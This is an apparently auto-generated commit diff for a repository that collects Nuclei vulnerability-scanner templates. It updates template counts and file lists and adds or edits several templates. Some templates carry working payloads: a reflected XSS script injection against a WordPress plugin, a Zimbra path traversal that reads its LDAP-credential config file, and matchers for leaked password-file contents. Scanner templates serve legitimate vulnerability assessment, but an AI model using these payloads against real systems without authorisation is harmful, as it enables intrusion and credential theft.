Auto Updated

README.md

@@ -8,7 +8,7 @@
 | CVE-2004 | 5 |
 | CVE-2005 | 15 |
 | CVE-2006 | 19 |
-| CVE-2007 | 63 |
+| CVE-2007 | 62 |
 | CVE-2008 | 74 |
 | CVE-2009 | 45 |
 | CVE-2010 | 139 |
@@ -20,63 +20,30 @@
 | CVE-2016 | 248 |
 | CVE-2017 | 398 |
 | CVE-2018 | 446 |
-| CVE-2019 | 514 |
-| CVE-2020 | 594 |
-| CVE-2021 | 1724 |
-| CVE-2022 | 2473 |
-| CVE-2023 | 4770 |
-| CVE-2024 | 5191 |
-| Other | 25357 |
+| CVE-2019 | 515 |
+| CVE-2020 | 592 |
+| CVE-2021 | 1726 |
+| CVE-2022 | 2472 |
+| CVE-2023 | 4772 |
+| CVE-2024 | 5199 |
+| Other | 25367 |
 ## 近几天数量变化情况
-|2024-09-21 | 2024-09-22 | 2024-09-23 | 2024-09-24 | 2024-09-25 | 2024-09-26 | 2024-09-27|
+|2024-09-22 | 2024-09-23 | 2024-09-24 | 2024-09-25 | 2024-09-26 | 2024-09-27 | 2024-09-28|
 |--- | ------ | ------ | ------ | ------ | ------ | ---|
-|43257 | 43266 | 43267 | 43279 | 43315 | 43396 | 43436|
+|43266 | 43267 | 43279 | 43315 | 43396 | 43436 | 43455|
 ## 最近新增文件
 | templates name | 
 | --- |
-| CVE-2022-4541.yaml |
-| CVE-2023-27584.yaml |
-| order-hours-scheduler-for-woocommerce.yaml |
-| x-forwarded-host.yaml |
-| themedy-toolbox.yaml |
-| king-ie.yaml |
-| dragonfly-public-signup.yaml |
-| dragonfly-panel.yaml |
-| ssti-detection-template.yaml |
-| dragonfly-default-login.yaml |
-| 012-ps-multi-languages.yaml |
-| nm-visitors.yaml |
-| gf-custom-style.yaml |
-| wp-xyz-takeover.yaml |
-| hugegraph-detect.yaml |
-| concrete5xss210530001807-220331-222149.yaml |
-| panmicro-arbitrary-file-read.yaml |
-| maestro-listserv-panel.yaml |
-| ivanti-csa-panel.yaml |
-| weebly-takeover.yaml |
-| sight.yaml |
-| common-tools-for-site.yaml |
-| nacos-info-leak.yaml |
-| CVE-2024-8872.yaml |
-| CVE-2024-30188.yaml |
-| CVE-2024-8803.yaml |
-| CVE-2024-8633.yaml |
-| CVE-2024-9117.yaml |
-| CVE-2024-8725.yaml |
-| CVE-2024-9125.yaml |
-| CVE-2024-9177.yaml |
-| CVE-2024-7781.yaml |
-| CVE-2024-8704.yaml |
-| CVE-2024-8723.yaml |
-| CVE-2024-8861.yaml |
-| CVE-2024-7772.yaml |
-| CVE-2024-9173.yaml |
-| CVE-2024-38473.yaml |
-| CVE-2024-9127.yaml |
-| CVE-2024-9115.yaml |
-| CVE-2024-8552.yaml |
-| CVE-2024-8771.yaml |
-| CVE-2024-41810.yaml |
-| CVE-2024-9025.yaml |
-| CVE-2024-8126.yaml |
-| CVE-2017-3132.yaml |
+| db-dump-detect.yaml |
+| keycloak-master-realm.yaml |
+| js-version-jszip_3-0-0_3-8-0.yaml |
+| js-version-jszip_3-6-0.yaml |
+| CVE-2024-8991.yaml |
+| CVE-2024-8922.yaml |
+| CVE-2024-7761.yaml |
+| CVE-2024-8965.yaml |
+| CVE-2024-7149.yaml |
+| CVE-2024-6887.yaml |
+| CVE-2024-9049.yaml |
+| CVE-2024-9130.yaml |
+| CVE-2024-8681.yaml |

data.json

@@ -202,5 +202,6 @@
     "2024-09-24": 43279,
     "2024-09-25": 43315,
     "2024-09-26": 43396,
-    "2024-09-27": 43436
+    "2024-09-27": 43436,
+    "2024-09-28": 43455
 }

data1.json

@@ -50631,5 +50631,18 @@
     "CVE-2024-41810.yaml": "2024-09-27 02:26:52",
     "CVE-2024-9025.yaml": "2024-09-27 02:26:52",
     "CVE-2024-8126.yaml": "2024-09-27 02:26:52",
-    "CVE-2017-3132.yaml": "2024-09-27 02:26:52"
+    "CVE-2017-3132.yaml": "2024-09-27 02:26:52",
+    "db-dump-detect.yaml": "2024-09-28 02:24:52",
+    "keycloak-master-realm.yaml": "2024-09-28 02:24:52",
+    "js-version-jszip_3-0-0_3-8-0.yaml": "2024-09-28 02:24:52",
+    "js-version-jszip_3-6-0.yaml": "2024-09-28 02:24:52",
+    "CVE-2024-8991.yaml": "2024-09-28 02:24:52",
+    "CVE-2024-8922.yaml": "2024-09-28 02:24:52",
+    "CVE-2024-7761.yaml": "2024-09-28 02:24:52",
+    "CVE-2024-8965.yaml": "2024-09-28 02:24:52",
+    "CVE-2024-7149.yaml": "2024-09-28 02:24:52",
+    "CVE-2024-6887.yaml": "2024-09-28 02:24:52",
+    "CVE-2024-9049.yaml": "2024-09-28 02:24:52",
+    "CVE-2024-9130.yaml": "2024-09-28 02:24:52",
+    "CVE-2024-8681.yaml": "2024-09-28 02:24:52"
 }

nuclei-templates/CVE-2001/CVE-2001-1473.yaml

@@ -0,0 +1,26 @@
+id: CVE-2001-1473
+info:
+  name: Deprecated SSHv1 Protocol Detection
+  author: iamthefrogy
+  severity: high
+  tags: cve,cve2001,network,ssh,openssh
+  description: SSHv1 is deprecated and has known cryptographic issues.
+  remediation: Upgrade to SSH 2.4 or later.
+  reference:
+    - https://www.kb.cert.org/vuls/id/684820
+    - https://nvd.nist.gov/vuln/detail/CVE-2001-1473
+  classification:
+    cvss-score: 7.4
+    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cve-id: CVE-2001-1473
+    cwe-id: CWE-310
+network:
+  - host:
+      - "{{Hostname}}"
+      - "{{Host}}:22"
+    matchers:
+      - type: word
+        words:
+          - "SSH-1"
+
+# Updated by Chris on 2022/01/21

nuclei-templates/CVE-2008/CVE-2008-6222.yaml

@@ -8,6 +8,10 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/6980
     - https://www.cvedetails.com/cve/CVE-2008-6222
+    - http://secunia.com/advisories/32523
+    - http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/
+  classification:
+    cve-id: CVE-2008-6222
   tags: cve,cve2008,joomla,lfi
 
 requests:
@@ -20,7 +24,7 @@ requests:
 
       - type: regex
         regex:
-          - "root:.*:0:0"
+          - "root:.*:0:0:"
 
       - type: status
         status:

nuclei-templates/CVE-2010/cve-2010-1871.yaml

@@ -0,0 +1,24 @@
+id: CVE-2010-1871
+
+info:
+  name: JBoss Seam 2 Code Execution
+  author: medbsq
+  severity: high
+# - https://www.cvebase.com/cve/2010/1871
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}:8080/scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://jz:<s>zie"
+    headers:
+      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "java.lang."
+          - "For input string: \"<s>zie\""
+        condition: and
+        part: body
+      - type: status
+        status:
+          - 200

nuclei-templates/CVE-2013/CVE-2013-6281.yaml

@@ -0,0 +1,46 @@
+id: CVE-2013-6281
+
+info:
+  name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS
+  author: random-robbie
+  severity: medium
+  description: |
+    The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf
+    - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/
+    - https://wordpress.org/plugins/dhtmlxspreadsheet/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2013-6281
+    cwe-id: CWE-79
+  metadata:
+    google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet
+    verified: "true"
+  tags: cve,cve2013,wordpress,xss,wp-plugin,wp
+
+requests:
+  - raw:
+      - |
+        GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "page: '<script>alert(document.domain)</script>'"
+          - "dhx_rel_path"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

nuclei-templates/CVE-2013/CVE-2013-7091.yaml

@@ -1,17 +1,25 @@
 id: CVE-2013-7091
 
 info:
-  name: Zimbra Collaboration Server 7.2.2/8.0.2 LFI
+  name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion
   author: rubina119
   severity: critical
-  description: Directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
+  description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2013-7091
     - https://www.exploit-db.com/exploits/30085
     - https://www.exploit-db.com/exploits/30472
-  tags: cve,cve2013,zimbra,lfi
+    - http://www.exploit-db.com/exploits/30085
+  classification:
+    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
+    cvss-score: 5
+    cve-id: CVE-2013-7091
+    cwe-id: CWE-22
+  tags: zimbra,lfi,edb,cve,cve2013
+  metadata:
+    max-request: 2
 
-requests:
+http:
   - method: GET
     path:
       - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
@@ -33,4 +41,6 @@ requests:
 
       - type: regex
         regex:
-          - "root=.*:0:0"
+          - "root=.*:0:0"
+
+# Enhanced by mp on 2022/02/24